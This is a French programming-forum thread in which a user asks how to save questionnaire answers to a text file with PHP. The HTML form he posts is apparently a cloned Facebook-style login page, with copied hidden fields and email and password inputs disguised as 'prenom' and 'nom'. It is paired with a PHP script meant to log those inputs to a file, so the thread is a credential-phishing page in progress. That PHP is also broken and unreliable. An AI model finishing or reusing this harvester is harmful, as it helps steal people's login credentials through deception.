Sauvegarder les résultats d'un questionnaire dans un .txt
Résolu
darcking
Messages postés
9
Membre
Dernière intervention
-
darcking Messages postés 9 Date d'inscription Statut Membre Dernière intervention -
darcking Messages postés 9 Date d'inscription Statut Membre Dernière intervention -
bonjour,
je veut sauvegarder les résultats d'un questionnaire html dans un .txt via php sans mysql
et merci de répondre avec le code html et php a la fois éviter en plusieurs partie sauf si c pour mieux m'aider à comprendre (ce n'est pas de refus)
cordialement,
darcking
je veut sauvegarder les résultats d'un questionnaire html dans un .txt via php sans mysql
et merci de répondre avec le code html et php a la fois éviter en plusieurs partie sauf si c pour mieux m'aider à comprendre (ce n'est pas de refus)
cordialement,
darcking
A voir également:
- Sauvegarder les résultats d'un questionnaire dans un .txt
- Resultats foot - Télécharger - Vie quotidienne
- Lexer resultats - Télécharger - Sport
- Sauvegarder favoris chrome - Guide
- Sauvegarder sms iphone - Guide
- Sauvegarder favoris firefox - Guide
2 réponses
Bonsoir,
Avec un tout petit peu de recherche sur internet : https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/913492-lisez-et-ecrivez-dans-un-fichier
Cordialement,
Avec un tout petit peu de recherche sur internet : https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/913492-lisez-et-ecrivez-dans-un-fichier
Cordialement,
darcking
Messages postés
9
Membre
Dernière intervention
j'ai déjà été sur ce site mais ce que je veut c'est écrire le résultat du formulaire et pas un compteur de visite
Utilisateur anonyme
A toi de l'arranger à ta sauce. tu récupères les valeurs de ton formulaire, et tu les enregistres.
darcking
Messages postés
9
Membre
Dernière intervention
j'essaie et je te redit
darcking
Messages postés
9
Membre
Dernière intervention
sa ne marche pas
Bonjour
Qu'as tu essayé ??
Quel code as tu commence à écrire ??
Je ne fourni du code que quand c'est nécessaire ou que je suis motivé..... mais à condition que le "demandeur" fasse un minimum d'efforts. .. et qu'il ne réclame pas un travail tout fait ! ( à moins que tu payes... ?? Lol )
Qu'as tu essayé ??
Quel code as tu commence à écrire ??
Je ne fourni du code que quand c'est nécessaire ou que je suis motivé..... mais à condition que le "demandeur" fasse un minimum d'efforts. .. et qu'il ne réclame pas un travail tout fait ! ( à moins que tu payes... ?? Lol )
<form id="form1" name="form1" method="post" action='updatetxt.php' enctype='multipart/form-data'><div class="pam uiBoxYellow">Vous devez vous connecter pour continuer.</div><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value=""><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value=""><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value=""><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="1"><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value=""><input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value=""><input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value=""><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1"><input type="hidden" autocomplete="off" name="timezone" value="-60" id="u_0_0"><input type="hidden" autocomplete="off" name="lgndim" value="eyJ3IjoxNjAwLCJoIjo5MDAsImF3IjoxNjAwLCJhaCI6ODYwLCJjIjoyNH0=" id="u_0_1"><input type="hidden" name="lgnrnd" value="090928_-M90"><input type="hidden" id="lgnjs" name="lgnjs" value="1452704946"><div class="form_row clearfix"><div class=""><label class="login_form_label">Adresse e-mail ou mobile :</label><input type="text" name="prenom"></div></div><div class="form_row clearfix"><div class=""><label class="login_form_label">Mot de passe :</label><input type="password" name="nom"></div></div><div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox"><label for="persist_box" class="uiInputLabelLabel">Garder ma session active</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0"><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_2"><input value="Connexion" name="login" tabindex="1" type="submit" id="u_0_2"></label></div>
voici le code du formulaire
et le code de uploadtxt.php
<?php
$contenu = stripslashes((htmlentities($_POST['textarea'])));
$fichierouvert = fopen ("inclure.txt");
if (fwrite($fichierouvert, $contenu)) {
echo "Impossible d'écrire dans le fichier ($filename)";
exit;
}
?>
voici le code du formulaire
et le code de uploadtxt.php